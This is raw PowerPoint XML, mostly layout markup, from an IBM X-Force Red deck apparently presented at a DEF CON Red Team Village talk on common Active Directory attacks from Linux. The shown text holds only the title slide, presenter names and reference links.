                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B58FE6A3-6DD1-5C47-8683-B69134AF181E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>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dirty="0"/>
              <a:t>IBM Security X-Force Red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834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6" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF739527-44EF-3D48-B71D-C23CFA61DEEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="14621" r="14575"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3708401" y="-292100"/>
            <a:ext cx="5143498" cy="5727701"/>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dirty="0"/>
              <a:t>IBM Security X-Force Red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36907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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29962711-E66C-FB48-937E-35D9858AE630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2583595"/>
            <a:ext cx="9144000" cy="2336801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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5999"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22493843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00" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5C870FD-688A-454D-ABF5-8555C24C1B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2336800"/>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dirty="0"/>
              <a:t>IBM Security X-Force Red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5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE7190F-304F-1A4A-A8CD-94369ED5C7BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2365283" y="1089818"/>
            <a:ext cx="2003517" cy="326945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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{883B9676-D6E2-5442-A2F2-716B33038458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4649411" y="1089818"/>
            <a:ext cx="2003517" cy="326945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
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67F8C3D-B2EF-214B-8E15-FE13EA385DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6937283" y="1089817"/>
            <a:ext cx="2006692" cy="3268287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="9600" b="0" i="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="D02471"/>
                    </a:gs>
                    <a:gs pos="70000">
                      <a:srgbClr val="D91E28"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="18000000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="IBM Plex Sans ExtraLight" panose="020B0303050203000203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to add text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42429113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97" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4494E9BF-5E35-7344-8143-FE489FFC301C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2336800"/>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dirty="0"/>
              <a:t>IBM Security X-Force Red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94042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92" name="X-Force_Red_logo_grd_color_RGB.png" descr="X-Force_Red_logo_grd_color_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A15FD99-CF2E-5B4C-9655-2792DCC8D928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3483923" y="1247135"/>
            <a:ext cx="2176153" cy="2649230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6048447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93" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D58E78-4E30-2D40-9D71-3639DECE7D61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="29222" r="10778" b="40000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1568" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>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747045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55" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F62A9E05-D42F-9D45-B7B7-38B8DB99CA2F}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="X-ForceRed_lockup_rev_RGB.png" descr="X-ForceRed_lockup_rev_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D7EA34-5535-0F48-87EE-61FA410F310F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>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6845182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3" y="168828"/>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2"/>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52" descr="A close up of a logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31454A06-245B-A140-95E4-5463AF5C85FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>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20716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3174139"/>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2"/>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6" name="X-ForceRed_lockup_rev_RGB.png" descr="X-ForceRed_lockup_rev_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487F177C-A869-7F41-A694-16E3DEF9943F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76396" y="4613450"/>
            <a:ext cx="1527048" cy="530050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2858210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r:embed="rId2"/>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A close up of a logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AAF1587-2D84-2B40-ABD1-26D91C729070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="204788" y="4743426"/>
            <a:ext cx="1271016" cy="264372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1817916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52" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{110989B0-CF01-0248-B000-BBE676924319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="29223" r="10777" b="40000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143995" cy="5143497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1622" name="Picture 5" descr="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3925952" y="2315616"/>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4"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5635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742932"/>
            <a:ext cx="6461189"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0214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X-Force Red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6102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08" y="168828"/>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4"/>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50" marR="0" lvl="3" indent="-193675" algn="l" defTabSz="914400"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4"/>
            <a:ext cx="415668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dirty="0"/>
              <a:t>IBM Security X-Force Red / © 2020 IBM Corporation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8346714" y="4837444"/>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4"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rgbClr val="9FA5A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74" r:id="rId1"/>
    <p:sldLayoutId id="2147484068" r:id="rId2"/>
    <p:sldLayoutId id="2147484069" r:id="rId3"/>
    <p:sldLayoutId id="2147483825" r:id="rId4"/>
    <p:sldLayoutId id="2147483973"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4280" r:id="rId15"/>
    <p:sldLayoutId id="2147484279" r:id="rId16"/>
    <p:sldLayoutId id="2147484278" r:id="rId17"/>
    <p:sldLayoutId id="2147484277" r:id="rId18"/>
    <p:sldLayoutId id="2147484276" r:id="rId19"/>
    <p:sldLayoutId id="2147483985" r:id="rId20"/>
    <p:sldLayoutId id="2147483986" r:id="rId21"/>
    <p:sldLayoutId id="2147483988" r:id="rId22"/>
    <p:sldLayoutId id="2147484113" r:id="rId23"/>
    <p:sldLayoutId id="2147483989" r:id="rId24"/>
    <p:sldLayoutId id="2147483990" r:id="rId25"/>
    <p:sldLayoutId id="2147483991" r:id="rId26"/>
    <p:sldLayoutId id="2147483992" r:id="rId27"/>
    <p:sldLayoutId id="2147483994" r:id="rId28"/>
    <p:sldLayoutId id="2147483995" r:id="rId29"/>
    <p:sldLayoutId id="2147483997" r:id="rId30"/>
    <p:sldLayoutId id="2147483998" r:id="rId31"/>
    <p:sldLayoutId id="2147483999" r:id="rId32"/>
    <p:sldLayoutId id="2147484000" r:id="rId33"/>
    <p:sldLayoutId id="2147484001" r:id="rId34"/>
    <p:sldLayoutId id="2147484114" r:id="rId35"/>
    <p:sldLayoutId id="2147483828" r:id="rId36"/>
    <p:sldLayoutId id="2147484002" r:id="rId37"/>
    <p:sldLayoutId id="2147484115" r:id="rId38"/>
    <p:sldLayoutId id="2147484003" r:id="rId39"/>
    <p:sldLayoutId id="2147484004" r:id="rId40"/>
    <p:sldLayoutId id="2147484022" r:id="rId41"/>
    <p:sldLayoutId id="2147484006" r:id="rId42"/>
    <p:sldLayoutId id="2147484007" r:id="rId43"/>
    <p:sldLayoutId id="2147484008" r:id="rId44"/>
    <p:sldLayoutId id="2147484116" r:id="rId45"/>
    <p:sldLayoutId id="2147484117" r:id="rId46"/>
    <p:sldLayoutId id="2147484118" r:id="rId47"/>
    <p:sldLayoutId id="2147484119" r:id="rId48"/>
    <p:sldLayoutId id="2147484120" r:id="rId49"/>
    <p:sldLayoutId id="2147484121" r:id="rId50"/>
    <p:sldLayoutId id="2147484122" r:id="rId51"/>
    <p:sldLayoutId id="2147484123" r:id="rId52"/>
    <p:sldLayoutId id="2147484124" r:id="rId53"/>
    <p:sldLayoutId id="2147484125" r:id="rId54"/>
    <p:sldLayoutId id="2147484126" r:id="rId55"/>
    <p:sldLayoutId id="2147484127" r:id="rId56"/>
    <p:sldLayoutId id="2147484128" r:id="rId57"/>
    <p:sldLayoutId id="2147484150" r:id="rId58"/>
    <p:sldLayoutId id="2147484151" r:id="rId59"/>
    <p:sldLayoutId id="2147484009" r:id="rId60"/>
    <p:sldLayoutId id="2147484010" r:id="rId61"/>
    <p:sldLayoutId id="2147484024" r:id="rId62"/>
    <p:sldLayoutId id="2147484023" r:id="rId63"/>
    <p:sldLayoutId id="2147484013" r:id="rId64"/>
    <p:sldLayoutId id="2147484014" r:id="rId65"/>
    <p:sldLayoutId id="2147484015" r:id="rId66"/>
    <p:sldLayoutId id="2147484016" r:id="rId67"/>
    <p:sldLayoutId id="2147484017" r:id="rId68"/>
    <p:sldLayoutId id="2147484018" r:id="rId69"/>
    <p:sldLayoutId id="2147484019" r:id="rId70"/>
    <p:sldLayoutId id="2147484020" r:id="rId71"/>
    <p:sldLayoutId id="2147484021" r:id="rId72"/>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userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="129" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="5634" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="2746" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="3114" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="2880">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="2754" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="1440">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="3009" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="1314" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" pos="1569" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" pos="4320" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" pos="4191" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" pos="4449" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="15" orient="horz" pos="494" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="18" orient="horz" pos="1620">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="19" orient="horz" pos="1247" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="20" orient="horz" pos="1980" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="21" orient="horz" pos="2364" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="22" orient="horz" pos="8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12"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s>
</file>

<file path=ppt/slides/_rels/slide2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12"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0.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment3.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout30.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.jpg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.jpg"/><Relationship Id="rId14"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Shikata_VX" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout28.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/_sandw1ch" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/_choise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hyperlink" Target="https://defcon.org/html/links/dc-code-of-conduct.html" TargetMode="Externa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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=425" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.harmj0y.net/redteaming/the-trustpocalypse/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/wp-content/uploads/2023/08/SLIDES_SCCM-Exploitation-The-First-Cred-Is-The-Deepest-II-Gabriel-Prudhomme-BHIS.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout32.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thehacker.recipes/ad/movement/trusts" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://harmj0y.medium.com/a-guide-to-attacking-domain-trusts-ef5f8992bb9d" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/garrettfoster13/sccmhunter"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hyperlink" Target="http://signup.xfr.best/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://slides.xfr.best/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout30.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rtv.defcon.wt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27B3-DAD2-E846-8915-8A6C69A65CA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans Light"/>
              </a:rPr>
              <a:t>How Most Internal Networks are Compromised: A Set of Common Active Directory Attacks and How to Perform Them from Linux </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans Light"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3734B902-BACB-E143-A876-50DFAB8819EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Shikata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, Scott Brink, (Sung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Gwan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> Choi)</a:t>
            </a:r>
          </a:p>
